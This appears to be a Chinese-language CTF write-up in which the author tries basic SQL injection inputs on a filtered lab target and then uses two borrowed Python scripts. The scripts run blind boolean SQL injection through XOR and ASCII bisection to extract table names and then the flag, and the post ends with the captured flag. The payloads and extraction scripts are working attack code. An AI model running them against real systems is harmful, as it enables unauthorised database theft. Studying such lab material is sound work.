进入靶场
吓我一跳,但凡放个彭于晏我都不说啥了
提交个1看看
1 and 1=1
1'#
还实验了很多,不过都被过滤了,头疼
看看别人的WP
竟然要写代码去跑!!!,不会啊,先用别人的代码吧,后续一定去学
第一个代码爆出表名
- from turtle import right
- import requests
- import time
- url = "http://..........."
- table_name = ""
- i = 0
- while True:
- i = i + 1
- letf = 32
- right = 127
- while letf < right:
- mid = (letf + right) // 2
- payload = f"0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),{i},1))>{mid})"
- data = {"id": payload}
- res = requests.post(url=url, data=data).text
- if "Nu1L" in res:
- letf = mid + 1
- else:
- right = mid
- if letf != 32:
- table_name += chr(letf)
- time.sleep(0.2)
- print(table_name)
- else:
- break
得到表名 giers233333333333333,f1ag_1s_h3r3_hhhhh
第二个代码通过表名爆出flag
- import requests
- import time
-
-
- url = "http://........."
- flag = ""
- i = 0
-
-
- while True:
- i = i + 1
- letf = 32
- right = 127
- while letf < right:
- s = flag
- mid = (letf+right) // 2
- s = s + chr(mid)
- payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"
- data = {"id":payload}
- res = requests.post(url=url,data=data).text
- if "Nu1L" in res:
- letf = mid + 1
- else:
- right = mid
- if letf != 32:
- flag += chr(letf-1)
- print(flag)
- time.sleep(0.2)
- else:
- break
即flag{e6ac8b59-ec60-4bc1-a3c9-c6b770b889ce}
条记
学习python脚本怎么写
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 | 
